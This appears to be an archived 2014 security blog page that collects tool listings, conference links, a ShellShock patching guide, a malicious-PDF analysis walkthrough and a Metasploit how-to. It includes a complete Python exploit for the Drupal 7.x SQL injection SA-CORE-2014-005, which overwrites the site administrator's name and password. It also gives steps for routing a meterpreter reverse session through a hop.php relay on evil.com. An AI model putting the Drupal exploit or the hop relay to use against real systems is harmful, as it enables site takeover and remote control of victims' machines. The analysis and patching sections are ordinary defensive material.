CVE Feeds

Oct 21, 2014

Tools: Findbugs + FindSecurityBugs - Java security static analysis tool

FindBugs

a program which uses static analysis to look for bugs in Java code.  It is free software, distributed under the terms of the Lesser GNU Public License. The name FindBugs™ and the FindBugs logo are trademarked by The University of Maryland. FindBugs has been downloaded more than a million times. 

Source:: http://findbugs.sourceforge.net/

FindSecurityBugs
For those who don't know about it, FindSecurityBugs is a plugin for the Java static analysis tool FindBugs. This plugin consist of a set rules that focus only on security weakness.

Source: http://blog.h3xstream.com/2014/10/find-security-bugs-new-version-and.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: RIPS (Static Source Code Analysis For PHP Vulnerabilities)

RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.  

Source: http://rips-scanner.sourceforge.net/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OWASP OWTF(Offensive Web Testing Framework)

OWASP OWTF is a project that aims to make security assessments as efficient as possible by automating the manual, uncreative part of pen testing


Source:: https://owtf.github.io/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 16, 2014

Ruxcon & Breakpoint - Material

https://ruxcon.org.au/slides/

https://ruxconbreakpoint.com/slides/

 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 3:
        print "host username password"
        print "http://nope.io admin wowsecure"
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +hash[:55] \
                +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
            print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
 
 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hack In The Box 2014 - Material

http://conference.hitb.org/hitbsecconf2014kul/materials/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from http://bradthemad.org/tech/notes/patching_rpms.php.
Then run the following commands from your %_topdir:
wget http://ftp.redhat.com/redhat/linux/updates/enterprise/4ES/en/os/SRPMS/bash-3.0-27.el4.src.rpm
rpm -ivh bash-3.0-27.el4.src.rpm
cd SOURCES
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-017
cd ..
Patch SPECS/bash.spec with this diff:
4c4
< Release: 27%{?dist}
---
> Release: 27.2%{?dist}
28a29
> Patch17: bash30-017
110c111,112
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
Then finish with these commands:
rpmbuild -ba SPECS/bash.spec
sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from gnu.org, so also download those into the same SOURCES directory:
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-018
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
4c4
< Release: 27%{?dist}
---
> Release: 27.2.019%{?dist}
28a29,31
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
110c113,116
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 
 
Source:  http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: PDF Analysis in 5 steps


  1. Find and Extract Javascript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities.
  2. Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag.  This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file.
  3. Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript
  4. Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its.
  5. Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed
Source: http://countuponsecurity.com/2014/09/22/malicious-documents-pdf-analysis-in-5-steps/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Brucon 2014

http://files.brucon.org/2014/videos/

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 14, 2014

Howto: use PHP Hop payload of Metasploit

1. The payload is in the $(metasploit folder)/data/php/hop.php

2. Copy hop.php to any website that you want

3. In exploit module, use windows/meterpreter/reverse_hop_http for payload options and set HOPURL to website that you set up in step#2(In this example: http://www.evil.com/hop.php)

4. Exploit the client, if exploit success, client will visit http://www.evil.com/hop.php and send the session to hop.php. After that you will get the meterpreter session :)


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |